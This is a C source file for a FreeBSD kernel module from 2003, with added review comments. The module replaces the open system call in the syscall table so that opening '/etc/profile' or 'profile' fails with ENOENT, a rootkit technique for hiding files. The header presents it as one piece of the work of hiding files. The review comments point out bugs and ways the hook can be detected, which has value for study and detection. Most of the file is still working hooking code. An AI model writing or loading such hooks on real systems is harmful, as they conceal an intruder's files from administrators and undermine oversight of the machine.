/*
* -=FreeBSD open_hidefile=-
*
* just an open syscall replacement
* one of the many syscalls you have to catch
* if you're planning to hide files.
*
* this one catches every open syscall and searches
* for a given filename, if it's found "NOTFOUND" is
* returned instead.
*
* this is _not_ enough to completely hide a file. You can still
* see it in various ways, but a 'cat /etc/profile'
* for example will return ENOENT.
* ...a better way would be to catch the filename via
* the underlying filesystem (ufs) aka via the vnode tables.
*
* proof:
*
* develop# cat /etc/profile
* cat: /etc/profile: No such file or directory
*
* develop# cd /etc
* develop# more profile
* profile: No such file or directory
*
* but you still can see it with 'ls'
* develop# ll /etc/profile
* -rw-r--r--  1 root  wheel  623 Aug 14  2002 /etc/profile
*
*
* Copyright (c) 2003, Gino Thomas
* All rights reserved.
* Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution. Neither the name of the nux-acid.org nor the names of its contributors may be used to endorse
* or promote products derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
* GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
* DAMAGE.
*
*/

#include <sys/types.h>
#include <sys/param.h>
#include <sys/proc.h>
#include <sys/module.h>
#include <sys/sysent.h>
#include <sys/kernel.h>
#include <sys/systm.h>
#include <sys/linker.h>
#include <sys/sysproto.h>
#include <sys/syscall.h>

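/*
 * file_hidden - tell the open hook whether a path is one of the two
 * hard-coded names it answers with ENOENT.
 *
 * filename: NUL-terminated path string, as copied in by the caller.
 * Returns 1 when filename is exactly "/etc/profile" or exactly "profile",
 * 0 otherwise.
 *
 * The comparison is an exact string match, so any other spelling of the
 * same file is not matched. The bare name "profile" is matched without
 * regard to the working directory, so opening any file by that relative
 * name fails while the hook is installed; that side effect is observable
 * from user space.
 */
int file_hidden(char *filename){

     static const char search[] = "/etc/profile";
     static const char search2[] = "profile";

     /* strcmp() returns an int, so the result is compared with 0, not NULL. */
     if (strcmp(filename, search) == 0 || strcmp(filename, search2) == 0) {
           /* 1 = caller reports 'not found' aka ENOENT */
           return 1;
     }

     /* 0 = nothing happens, the open proceeds normally */
     return 0;
}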

/*
 * Argument block as seen by the replacement open handler.
 * Only `path` is read in this file (by new_open); the struct pointer is
 * then handed unchanged to the kernel's open().
 * NOTE(review): new_open_sysent takes its argument count from
 * struct open_args, not from this struct, so the two layouts are assumed
 * to agree - confirm against sys/sysproto.h.
 */
struct new_open_args{
       char *path;   /* user-space pointer to the path string */
       int flags;    /* not read in this file */
       int mode;     /* not read in this file */
};

/*
 * new_open - handler that load_handler installs in sysent[SYS_open].
 *
 * Copies the caller's path into a kernel buffer, returns ENOENT when
 * file_hidden() matches it, and otherwise forwards the untouched
 * argument block to the kernel's open().
 *
 * p:   calling process, passed through to open().
 * uap: syscall arguments; uap->path is a user-space pointer.
 * Returns EFAULT if the copy-in faults, ENOENT for a matched name,
 * otherwise whatever open() returns.
 *
 * Review notes:
 *  - Only EFAULT from copyinstr() is treated as an error. Any other
 *    non-zero result (e.g. ENAMETOOLONG for a path longer than the
 *    1024 bytes requested) falls through, and kstr is then compared
 *    without a guaranteed NUL terminator.
 *  - `size` is an int, but copyinstr() takes a size_t * for the copied
 *    length; the value is never used afterwards.
 *  - The printf() formats uap->path, i.e. the user-space pointer, not
 *    the kstr copy, so the kernel reads user memory directly there.
 *  - The printf() runs for every open that is not refused, so a loaded
 *    module leaves one "The value passed was:" line per call in the
 *    kernel message output - a visible indicator when looking for this
 *    hook.
 */
static int new_open(struct proc *p, struct new_open_args *uap)
{
char kstr[1024+1];  /* kernel-side copy of the string at uap->path */
  int err = 0;      /* result of copyinstr() */
  int size = 0;     /* receives the copied length; not used afterwards */

  /* copy from userland to kernelland, uap struct holds the userland args */
  err = copyinstr(uap->path, kstr, 1024, &size);
  if (err == EFAULT)
  return(err);

  /* matched name: answer as if the file did not exist */
  if(file_hidden(kstr))return(ENOENT);

  /* NOTE(review): %s is given the user-space pointer, not kstr */
  printf("The value passed was: %s\n", uap->path);
  /* uap is a struct new_open_args * here; open() is declared for struct open_args * */
  return(open(p,uap));
}

/*
 * Syscall table entry for the replacement handler.
 * First initializer: argument count, computed from the kernel's own
 * struct open_args in units of register_t.
 * Second initializer: new_open cast to the generic handler type.
 * The initializers are positional - presumably sy_narg and sy_call are
 * the first two members of struct sysent; confirm against sys/sysent.h.
 */
static struct sysent new_open_sysent = {
        (sizeof(struct open_args) / sizeof(register_t)),
        (sy_call_t *)new_open
};


/*
 * Slot number handed to SYSCALL_MODULE; NO_SYSCALL means next free one.
 * load_handler does not read this value - it writes sysent[SYS_open]
 * directly.
 */
static int syscall_num = NO_SYSCALL;


/*
 * load_handler - module event handler passed to SYSCALL_MODULE.
 *
 * m, arg: not used.
 * what:   module event.
 * Returns 0 for MOD_LOAD and MOD_UNLOAD, EINVAL for any other event.
 *
 * MOD_LOAD overwrites the whole sysent[SYS_open] entry with
 * new_open_sysent; MOD_UNLOAD puts back only the sy_call pointer.
 * No lock is taken around either write in this function.
 *
 * While the module is loaded, sysent[SYS_open].sy_call holds the address
 * of new_open instead of the kernel's open, so comparing that table
 * entry with the address of the kernel's open symbol reveals the hook.
 */
static int
  load_handler(struct module *m, int what, void *arg)
  {
          int err = 0;

          switch (what) {
          case MOD_LOAD:
                  /* replace the open entry (argument count and handler) */
                  sysent[SYS_open]=new_open_sysent;
                  break;
          case MOD_UNLOAD:
                  /* restore the original handler pointer only */
                  sysent[SYS_open].sy_call = (sy_call_t *)open;
                  break;
          default:
                  /* every other event, shutdown included, is rejected */
                  err = EINVAL;
                  break;
      }
          return(err);
  }


/*
 * Module declaration: module name, address of the slot number, the
 * sysent entry, the event handler, and the handler's argument (NULL).
 * NOTE(review): with syscall_num set to NO_SYSCALL the syscall-module
 * framework presumably also registers new_open_sysent in a free slot,
 * in addition to the direct overwrite of sysent[SYS_open] done in
 * load_handler - confirm against sys/sysent.h.
 * The module is registered under the name new_open and should show up
 * under that name in the kernel's module listing (kldstat -v) - confirm.
 */
  SYSCALL_MODULE(
  new_open,
  &syscall_num,
  &new_open_sysent,
  load_handler,
  NULL);